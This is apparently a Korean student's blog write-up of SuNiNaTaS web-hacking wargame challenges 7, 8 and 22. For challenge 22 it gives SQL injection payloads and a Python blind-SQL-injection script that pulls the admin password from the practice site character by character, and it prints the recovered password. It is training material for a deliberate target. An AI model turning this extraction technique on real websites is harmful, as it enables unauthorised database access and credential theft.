7번
중간에 있는 yes버튼을 눌렀을 때
힌트는 이렇다
자바스크립트 코드도 확인해준다
116은 F5, 9는 tab이다
78은 n, 82는 r, ctrlKey는 그냥 Ctrl키다
F5를 누르면 No가 뜬다
이걸 이용해서 콘솔창에 입력해본다
frm.submit()를 입력해보겠다
근데 저렇게 하면 자꾸 느리다고 떠서 그냥 화면을 작게 하고 yes버튼을 바로 누르는 식으로 했다
8번
이렇게 보니 자동화 문제같기도 하다..
이렇게 설정해두고 공격 시작을 누른다
버프스위터는 너무 오래걸려서 파이썬코드로 했다
22번
필터링 키워드가 다 써있다
힌트를 보면 이렇다
admin'and len(pw)>9--를 입력하면 OK admin이라고 뜨고
admin'and len(pw)>10--을 입력하면 false라고 뜬다
여기서 길이가 10임을 알 수 있다
import requests
import time
URL="http://suninatas.com/challenge/web22/web22.asp"
start = time.time()
for i in range(10):
for j in range(32, 127):
url = URL+"?id=admin"+"'and substring(pw, {}, 1)='{}'--&pw=12".format(i+1, chr(j))
res = requests.get(url)
if "OK" in res.text:
print("found!:{} : {}".format(i, chr(j)))
break
end = time.time()
print(end - start)N1c3Bilnl)
이렇게 나왔다
'웹해킹' 카테고리의 다른 글
| 2025년 2학기 5주차 Portswigger (0) | 2025.10.11 |
|---|---|
| 2025년 2학기 5주차 드림핵 (0) | 2025.10.11 |
| 2025년 2학기 4주차 드림핵 (0) | 2025.10.04 |
| 2025년 2학기 3주차 (0) | 2025.09.28 |
| 2025년 2학기 2주차 (0) | 2025.09.20 |